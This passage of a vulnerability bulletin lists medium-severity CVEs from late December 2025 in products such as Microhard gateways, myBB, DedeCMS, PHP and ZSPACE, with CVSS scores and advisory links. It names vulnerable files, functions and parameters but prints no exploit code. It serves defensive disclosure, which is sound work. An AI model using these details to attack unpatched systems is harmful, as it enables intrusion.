| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks | Microhard Systems IPn4G 1.1.0 contains an authentication bypass vulnerability in the hidden system-editor.sh script that allows authenticated attackers to read, modify, or delete arbitrary files. Attackers can exploit unsanitized 'path', 'savefile', 'edit', and 'delfile' parameters to perform unauthorized file system modifications through GET and POST requests. | 2025-12-24 | 5.5 | CVE-2018-25144 | ExploitDB-45037 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5485) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download | Microhard Systems IPn4G 1.1.0 contains a configuration file disclosure vulnerability that allows authenticated attackers to download sensitive system configuration files. Attackers can retrieve configuration files from multiple directories including '/www', '/etc/m_cli/', and '/tmp' to access system passwords and network settings. | 2025-12-24 | 6.5 | CVE-2018-25145 | ExploitDB-45036 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5484) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities | Microhard Systems IPn4G 1.1.0 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to change admin passwords, add new users, and modify system settings by tricking authenticated users into loading a specially crafted page. | 2025-12-24 | 4.3 | CVE-2018-25149 | ExploitDB-45034 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5478) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS | Microhard Systems IPn4G 1.1.0 contains an undocumented vulnerability that allows authenticated attackers to list and manipulate running system processes. Attackers can send arbitrary signals to kill background processes and system services through a hidden feature, potentially causing service disruption and requiring device restart. | 2025-12-24 | 6.5 | CVE-2018-25146 | ExploitDB-45035 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5481) |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the template management system that allows authenticated administrators to inject malicious scripts when creating new templates. Attackers can exploit this vulnerability by inserting script payloads in the template title field when adding new templates through the 'Templates and Style' > 'Templates' > 'Manage Templates' > 'Global Templates' interface, causing arbitrary JavaScript to execute when the template is viewed. | 2025-12-22 | 5.4 | CVE-2023-53976 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Template Management |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the forum management system that allows authenticated administrators to inject malicious scripts when creating new forums. Attackers can exploit this vulnerability by inserting script payloads in the forum title field when adding new forums through the 'Forums and Posts' > 'Forum Management' interface, causing arbitrary JavaScript to execute when the forum listing is viewed. | 2025-12-22 | 5.4 | CVE-2023-53977 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Forum Management |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the forum announcement system that allows authenticated administrators to inject malicious scripts when creating announcements. Attackers can exploit this vulnerability by inserting script payloads in the announcement title field when adding announcements through the 'Forums and Posts' > 'Forum Announcements' interface, causing arbitrary JavaScript to execute when the announcement is displayed on the forum. | 2025-12-22 | 5.4 | CVE-2023-53978 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Forum Announcements |
| CmsEasy--CmsEasy | A flaw has been found in CmsEasy up to 7.7.7. Affected is the function savetemp_action in the library /lib/admin/template_admin.php of the component Backend Template Management Page. Executing manipulation of the argument content/tempdata can lead to code injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15148 | VDB-338525 \| CmsEasy Backend Template Management template_admin.php savetemp_action code injection VDB-338525 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716303 \| cmseasy 7.7.7 Command Injection https://note-hxlab.wetolink.com/share/msJH69Y06ZlS |
| DedeCMS--DedeCMS | A vulnerability was identified in DedeCMS up to 5.7.118. This impacts an unknown function of the file /freelist_main.php. The manipulation of the argument orderby leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2025-12-22 | 6.3 | CVE-2025-15004 | VDB-337710 \| DedeCMS freelist_main.php sql injection VDB-337710 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #717316 \| dedecms V5.7.118 SQL Injection https://note-hxlab.wetolink.com/share/JPq560c6F6tu |
| EyouCMS--EyouCMS | A security flaw has been discovered in EyouCMS up to 1.7.6. The affected element is an unknown function of the file /application/admin/logic/FilemanagerLogic.php of the component Backend Template Management. The manipulation of the argument content results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15143 | VDB-338521 \| EyouCMS Backend Template Management FilemanagerLogic.php sql injection VDB-338521 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716078 \| EyouCMS 1.7.6 Command Injection https://note-hxlab.wetolink.com/share/XfINjg5i25Ud |
| PbootCMS--PbootCMS | A security vulnerability has been detected in PbootCMS up to 3.2.12. The affected element is the function get_user_ip of the file core/function/handle.php of the component Header Handler. The manipulation of the argument X-Forwarded-For leads to use of less trusted source. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-12-28 | 5.3 | CVE-2025-15154 | VDB-338532 \| PbootCMS Header handle.php get_user_ip less trusted source VDB-338532 \| CTI Indicators (IOB, IOC, IOA) Submit #719818 \| PbootCMS 3.2.12 get_user_ip IP Address Spoofing https://note-hxlab.wetolink.com/share/JyBNgF8JagWQ |
| omec-project--UPF | A flaw has been found in omec-project UPF up to 2.1.3-dev. This affects the function handleSessionEstablishmentRequest of the file /pfcpiface/pfcpiface/messages_session.go of the component PFCP Session Establishment Request Handler. This manipulation causes null pointer dereference. The attack may be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 4.3 | CVE-2025-15156 | VDB-338534 \| omec-project UPF PFCP Session Establishment Request messages_session.go handleSessionEstablishmentRequest null pointer dereference VDB-338534 \| CTI Indicators (IOB, IOC, IOA) Submit #719824 \| Aether SD-Core UPF v2.1.3-dev NULL Pointer Dereference https://github.com/omec-project/upf/issues/979 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer. | 2025-12-24 | 6.4 | CVE-2025-68917 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS via the Font field for the Multilevel list settings window. This is related to DocumentServer. | 2025-12-25 | 6.4 | CVE-2025-68935 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS via the Color theme name. This is related to DocumentServer. | 2025-12-25 | 6.4 | CVE-2025-68936 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains multiple cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts through various input parameters. Attackers can exploit parameters like 'projid', 'CS_message', and 'name' to execute arbitrary JavaScript code in victims' browsers by submitting crafted payloads through application endpoints. | 2025-12-23 | 5.4 | CVE-2021-47716 | ExploitDB-50554 Official Orangescrum Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Cross-Site Scripting via Authenticated Endpoints |
| Pexip--Infinity | Pexip Infinity 32.0 through 37.1 before 37.2, in certain configurations of OTJ (One Touch Join) for Teams SIP Guest Join, has Improper Input Validation in the OTJ service, allowing a remote attacker to trigger a software abort via a crafted calendar invite, leading to a denial of service. | 2025-12-25 | 5.9 | CVE-2025-49088 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 38.0 and 38.1 before 39.0 has insufficient access control in the RTMP implementation, allowing an attacker to disconnect RTMP streams traversing a Proxy Node. | 2025-12-25 | 5.9 | CVE-2025-66378 | https://docs.pexip.com/admin/security_bulletins.htm |
| PHP Group--PHP | In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, and 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server. | 2025-12-27 | 6.5 | CVE-2025-14178 | https://github.com/php/php-src/security/advisories/GHSA-h96m-rvf9-jgm2 |
| PluginOps--Feather Login Page | Cross-Site Request Forgery (CSRF) vulnerability in PluginOps Feather Login Page allows Cross Site Request Forgery. This issue affects Feather Login Page: from n/a through 1.1.7. | 2025-12-22 | 4.3 | CVE-2025-62107 | https://vdp.patchstack.com/database/wordpress/plugin/feather-login-page/vulnerability/wordpress-feather-login-page-plugin-1-1-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| prasathmani--TinyFileManager | A flaw has been found in prasathmani TinyFileManager up to 2.6. Affected by this issue is some unknown functionality of the file tinyfilemanager.php. This manipulation of the argument fullpath causes path traversal. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15138 | VDB-338516 \| prasathmani TinyFileManager tinyfilemanager.php path traversal VDB-338516 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714177 \| tinyfilemanager 2.6 File Upload(RCE) https://mesquite-dream-86b.notion.site/tinyfilemanager-File-Upload-RCE-Report-2c7512562197800d86b3e68534a56a91 |
| PX4--PX4-Autopilot | A vulnerability was found in PX4 PX4-Autopilot up to 1.16.0. Affected by this issue is the function MavlinkLogHandler::state_listing/MavlinkLogHandler::log_entry_from_id of the file src/modules/mavlink/mavlink_log_handler.cpp. The manipulation results in stack-based buffer overflow. The attack is only possible with local access. The patch is identified as 338595edd1d235efd885fd5e9f45e7f9dcf4013d. It is best practice to apply a patch to resolve this issue. | 2025-12-28 | 5.3 | CVE-2025-15150 | VDB-338527 \| PX4 PX4-Autopilot mavlink_log_handler.cpp log_entry_from_id stack-based overflow VDB-338527 \| CTI Indicators (IOB, IOC, IOA) Submit #717323 \| PX4 Autopilot main branch Stack-based Buffer Overflow https://github.com/PX4/PX4-Autopilot/issues/26118 https://github.com/PX4/PX4-Autopilot/pull/26124 https://github.com/PX4/PX4-Autopilot/pull/26124/commits/338595edd1d235efd885fd5e9f45e7f9dcf4013d |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/login.cgi username SQL Injection. For example, an attacker can delete the LOGINFAILEDTABLE table. | 2025-12-24 | 6.5 | CVE-2025-68914 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/loginbanner_w.cgi XSS via a crafted banner. | 2025-12-24 | 5.5 | CVE-2025-68915 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| shanyu--SyCms | A vulnerability has been found in shanyu SyCms up to a242ef2d194e8bb249dc175e7c49f2c1673ec921. This issue affects the function addPost of the file Application/Admin/Controller/FileManageController.class.php of the component Administrative Panel. The manipulation leads to code injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. This product adopts a rolling release strategy to maintain continuous delivery. The project was informed of the problem early through an issue report but has not responded yet. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-28 | 4.7 | CVE-2025-15130 | VDB-338508 \| shanyu SyCms Administrative Panel FileManageController.class.php addPost code injection VDB-338508 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #712813 \| SyCms 1.0 Unrestricted Upload https://gitee.com/shanyu/SyCms/issues/IDCEWG |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that submit forged requests to create admin accounts by tricking logged-in users into visiting a malicious site. | 2025-12-24 | 5.3 | CVE-2018-25127 | ExploitDB-46834 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5520) |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages that submit HTTP requests to the radio processing interface, triggering unintended administrative operations when a logged-in user visits the page. | 2025-12-22 | 5.3 | CVE-2023-53961 | ExploitDB-51168 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5722) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Cross-Site Request Forgery |
| stellarwp--Membership Plugin Restrict Content | The Membership Plugin - Restrict Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'register_form' and 'restrict' shortcodes in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-23 | 6.4 | CVE-2025-14000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b6a84d7-9e77-4a2f-b065-872e8650e75e?source=cve https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/shortcodes.php#L26 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/shortcodes.php#L135 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/member-forms.php#L126 https://plugins.trac.wordpress.org/changeset/3420370/restrict-content/trunk/core/includes/member-forms.php?old=2642097&old_path=restrict-content%2Ftrunk%2Fcore%2Fincludes%2Fmember-forms.php https://plugins.trac.wordpress.org/changeset/3420370/restrict-content/trunk/core/includes/shortcodes.php?old=2850120&old_path=restrict-content%2Ftrunk%2Fcore%2Fincludes%2Fshortcodes.php |
| sunkaifei--FlyCMS | A security flaw has been discovered in sunkaifei FlyCMS up to abbaa5a8daefb146ad4d61027035026b052cb414. The affected element is an unknown function of the file src/main/java/com/flycms/web/system/IndexAdminController.java of the component Admin Login. Performing manipulation of the argument redirectUrl results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-26 | 4.3 | CVE-2025-15093 | VDB-338422 \| sunkaifei FlyCMS Admin Login IndexAdminController.java cross site scripting VDB-338422 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708996 \| sunkaifei FlyCms <=1.0.0 XSS https://github.com/sunkaifei/FlyCms/issues/15 |
| sunkaifei--FlyCMS | A weakness has been identified in sunkaifei FlyCMS up to abbaa5a8daefb146ad4d61027035026b052cb414. The impacted element is the function userLogin of the file src/main/java/com/flycms/web/front/UserController.java of the component User Login. Executing manipulation of the argument redirectUrl can lead to cross site scripting. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-26 | 4.3 | CVE-2025-15094 | VDB-338423 \| sunkaifei FlyCMS User Login UserController.java userLogin cross site scripting VDB-338423 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708997 \| sunkaifei FlyCms <=1.0.0 XSS https://github.com/sunkaifei/FlyCms/issues/16 |
| Synaccess Networks Inc.--netBooter NP-0801DU | Synaccess netBooter NP-0801DU 7.4 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages with hidden form submissions to add admin users by tricking authenticated administrators into loading a malicious page. | 2025-12-24 | 4.3 | CVE-2018-25133 | ExploitDB-45894 Synaccess Networks Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5501) |
| Teradek, LLC--Cube | Teradek Cube 7.3.6 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page with a hidden form to submit password change requests to the device's system configuration interface. | 2025-12-24 | 5.3 | CVE-2018-25156 | ExploitDB-44675 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5464) |
| Teradek, LLC--Slice | Teradek Slice 7.3.15 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page that automatically submits password change requests to the device when a logged-in user visits the page. | 2025-12-24 | 5.3 | CVE-2018-25155 | ExploitDB-44676 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5467) |
| Teradek, LLC--VidiU Pro | Teradek VidiU Pro 3.0.3 contains a server-side request forgery vulnerability in the management interface that allows attackers to manipulate GET parameters 'url' and 'xml_url'. Attackers can exploit this flaw to bypass firewalls, initiate network enumeration, and potentially trigger external HTTP requests to arbitrary destinations. | 2025-12-24 | 5.3 | CVE-2019-25251 | ExploitDB-44672 Teradek Product Homepage Zero Science Lab Disclosure (ZSL-2018-5461) |
| Teradek--VidiU Pro | Teradek VidiU Pro 3.0.3 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft malicious web pages that automatically submit password change requests to the device when a logged-in administrator visits the page. | 2025-12-24 | 5.3 | CVE-2019-25252 | ExploitDB-44671 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5460) |
| thehappymonster--Happy Addons for Elementor | The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ha_page_custom_js' parameter in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, despite the intended role restriction of Custom JS to Administrators. | 2025-12-23 | 6.4 | CVE-2025-14635 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16e7adef-68ab-4dd6-bd80-252622cfe705?source=cve https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.20.2/extensions/custom-js.php#L76 https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.20.2/extensions/custom-js.php#L60 https://plugins.trac.wordpress.org/changeset/3421733/ |
| TOZED--ZLT M30s | A vulnerability was found in TOZED ZLT M30s up to 1.47. Impacted is an unknown function of the file /reqproc/proc_post of the component Web Management Interface. Manipulation of the argument goformId results in information disclosure. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 5.3 | CVE-2025-15082 | VDB-338410; TOZED ZLT M30s Web Management proc_post information disclosure VDB-338410; CTI Indicators (IOB, IOC, TTP, IOA) Submit #707306; ZLT M30s MTNNGRM30S_1.47, M30S_1.47 (other versions might be vulnerable) Improper Access Control - Critical Information Disclosure https://www.hacklab.eu.org/blogs/zlt_m30s_information_disclosure https://youtu.be/u_H29UdiPOc |
| TRENDnet--TEW-822DRE | A vulnerability has been found in TRENDnet TEW-822DRE 1.00B21/1.01B06. This affects the function sub_43ACF4 of the file /boafrm/formWsc. Manipulation of the argument peerPin leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 6.3 | CVE-2025-15139 | VDB-338517; TRENDnet TEW-822DRE formWsc sub_43ACF4 command injection VDB-338517; CTI Indicators (IOB, IOC, TTP, IOA) Submit #715131; TRENDnet TEW-822DRE v1.01B06 / 1.00B21 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-822DRE-Command-Injection-2c9e5dd4c5a580f190e9c411ad627e9a#2c9e5dd4c5a5801dae7ad20828639d4b |
| Tyche softwares--Product Delivery Date for WooCommerce Lite | Vulnerability in Tyche softwares Product Delivery Date for WooCommerce - Lite. This issue affects Product Delivery Date for WooCommerce - Lite: from n/a through 2.7.0. | 2025-12-23 | 5.3 | CVE-2023-52210 | https://vdp.patchstack.com/database/wordpress/plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-2-7-0-broken-access-control-vulnerability?_s_id=cve |
| VideoFlow Ltd.--Digital Video Protection DVP | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows attackers to access arbitrary system files through unvalidated 'ID' parameters. Attackers can exploit multiple Perl scripts like downloadsys.pl to read sensitive files by manipulating directory path traversal in download requests. | 2025-12-24 | 6.5 | CVE-2019-25256 | ExploitDB-44386 VideoFlow Product Web Page Zero Science Lab Disclosure (ZSL-2018-5454) |
| VideoFlow Ltd.--VideoFlow Digital Video Protection DVP | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated remote code execution vulnerability that allows attackers to execute system commands with root privileges. Attackers can exploit the vulnerability through a cross-site request forgery (CSRF) mechanism to gain unauthorized system access. | 2025-12-24 | 4.3 | CVE-2019-25255 | ExploitDB-44387 VideoFlow Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5455) |
| Vikas Ratudi--Chakra test | Missing Authorization vulnerability in Vikas Ratudi Chakra test allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Chakra test: from n/a through 1.0.1. | 2025-12-23 | 4.3 | CVE-2025-68557 | https://vdp.patchstack.com/database/wordpress/plugin/chakra-test/vulnerability/wordpress-chakra-test-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Vikas Ratudi--VPSUForm | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Vikas Ratudi VPSUForm allows Retrieve Embedded Sensitive Data. This issue affects VPSUForm: from n/a through 3.2.24. | 2025-12-23 | 6.5 | CVE-2025-68551 | https://vdp.patchstack.com/database/wordpress/plugin/v-form/vulnerability/wordpress-vpsuform-plugin-3-2-24-sensitive-data-exposure-vulnerability?_s_id=cve |
| VillaTheme--HAPPY | Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.9. | 2025-12-23 | 5.3 | CVE-2025-68556 | https://vdp.patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| Voidthemes--Void Elementor WHMCS Elements For Elementor Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Voidthemes Void Elementor WHMCS Elements For Elementor Page Builder. This issue affects Void Elementor WHMCS Elements For Elementor Page Builder: from n/a through 2.0.1.2. | 2025-12-22 | 6.5 | CVE-2025-62094 | https://vdp.patchstack.com/database/wordpress/plugin/void-elementor-whmcs-elements/vulnerability/wordpress-void-elementor-whmcs-elements-for-elementor-page-builder-plugin-2-0-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WebCodingPlace--Responsive Posts Carousel Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebCodingPlace Responsive Posts Carousel Pro allows Stored XSS. This issue affects Responsive Posts Carousel Pro: from n/a through 15.2. | 2025-12-23 | 6.5 | CVE-2025-68548 | https://vdp.patchstack.com/database/wordpress/plugin/responsive-posts-carousel-pro/vulnerability/wordpress-responsive-posts-carousel-pro-plugin-15-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wpshuffle--Frontend Post Submission Manager Lite Frontend Posting WordPress Plugin | The Frontend Post Submission Manager Lite - Frontend Posting WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to an incorrect authorization check on the 'media_delete_action' function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to delete arbitrary attachments. | 2025-12-25 | 5.3 | CVE-2025-14913 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19a6b19c-244d-4b30-8db2-b4d06a5f5509?source=cve https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.6/includes/classes/class-fpsml-ajax.php#L91 https://plugins.trac.wordpress.org/changeset/3427082/frontend-post-submission-manager-lite |
| youlaitech--youlai-mall | A security flaw has been discovered in youlaitech youlai-mall 1.0.0/2.0.0. This affects the function deductBalance of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java of the component Balance Handler. The manipulation results in improper authorization. The attack can be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15085 | VDB-338413; youlaitech youlai-mall Balance MemberController.java deductBalance improper authorization VDB-338413; CTI Indicators (IOB, IOC, TTP, IOA) Submit #708175; youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/26 |
| youlaitech--youlai-mall | A weakness has been identified in youlaitech youlai-mall 1.0.0/2.0.0. This impacts the function getMemberByMobile of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java. The manipulation causes improper access controls. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15086 | VDB-338414; youlaitech youlai-mall MemberController.java getMemberByMobile access control VDB-338414; CTI Indicators (IOB, IOC, TTP, IOA) Submit #708176; youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/27 |
| youlaitech--youlai-mall | A security vulnerability has been detected in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function submitOrderPayment of the file mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java. Manipulation of the argument orderSn leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The real existence of this vulnerability is still doubted at the moment. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15087 | VDB-338415; youlaitech youlai-mall OrderController.java submitOrderPayment improper authorization VDB-338415; CTI Indicators (IOB, IOC, TTP, IOA) Submit #708180; youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/30 |
| YunaiV--yudao-cloud | A vulnerability was determined in YunaiV yudao-cloud up to 2025.11. This affects the function BpmHttpCallbackTrigger/BpmSyncHttpRequestTrigger of the component Business Process Management. Manipulation of the argument url/header/body can lead to server-side request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-26 | 6.3 | CVE-2025-15098 | VDB-338429; YunaiV yudao-cloud Business Process Management BpmSyncHttpRequestTrigger server-side request forgery VDB-338429; CTI Indicators (IOB, IOC, IOA) Submit #710170; YunaiV YuDao Cloud <=v2025.11 Server-Side Request Forgery https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md#proof-of-concept |
| ZKTeco--BioTime | A vulnerability was detected in ZKTeco BioTime up to 9.0.3/9.0.4/9.5.2. This affects an unknown part of the file /base/safe_setting/ of the component Endpoint. Manipulation of the argument backup_encryption_password_decrypt/export_encryption_password_decrypt results in unprotected storage of credentials. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 5.3 | CVE-2025-15128 | VDB-338506; ZKTeco BioTime Endpoint safe_setting credentials storage VDB-338506; CTI Indicators (IOB, IOC, TTP, IOA) Submit #711813; ZkBioTime CMS 9.0.3, 9.0.4, 9.5.2 IDOR https://github.com/ionutluca888/IDOR-POC-ZKBio-Time/tree/main |
| ZSPACE--Z4Pro+ | A vulnerability was found in ZSPACE Z4Pro+ 1.0.0440024. Impacted is the function zfilev2_api_SafeStatus of the file /v2/file/safe/status of the component HTTP POST Request Handler. The manipulation results in command injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15131 | VDB-338509; ZSPACE Z4Pro+ HTTP POST Request status zfilev2_api_SafeStatus command injection VDB-338509; CTI Indicators (IOB, IOC, TTP, IOA) Submit #713874; ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/1 |
| ZSPACE--Z4Pro+ | A vulnerability was determined in ZSPACE Z4Pro+ 1.0.0440024. The affected element is the function zfilev2_api_open of the file /v2/file/safe/open of the component HTTP POST Request Handler. The manipulation causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15132 | VDB-338510; ZSPACE Z4Pro+ HTTP POST Request open zfilev2_api_open command injection VDB-338510; CTI Indicators (IOB, IOC, TTP, IOA) Submit #713885; ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/2 |
| ZSPACE--Z4Pro+ | A vulnerability was identified in ZSPACE Z4Pro+ 1.0.0440024. The impacted element is the function zfilev2_api_CloseSafe of the file /v2/file/safe/close of the component HTTP POST Request Handler. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15133 | VDB-338511; ZSPACE Z4Pro+ HTTP POST Request close zfilev2_api_CloseSafe command injection VDB-338511; CTI Indicators (IOB, IOC, TTP, IOA) Submit #713887; ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/3 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
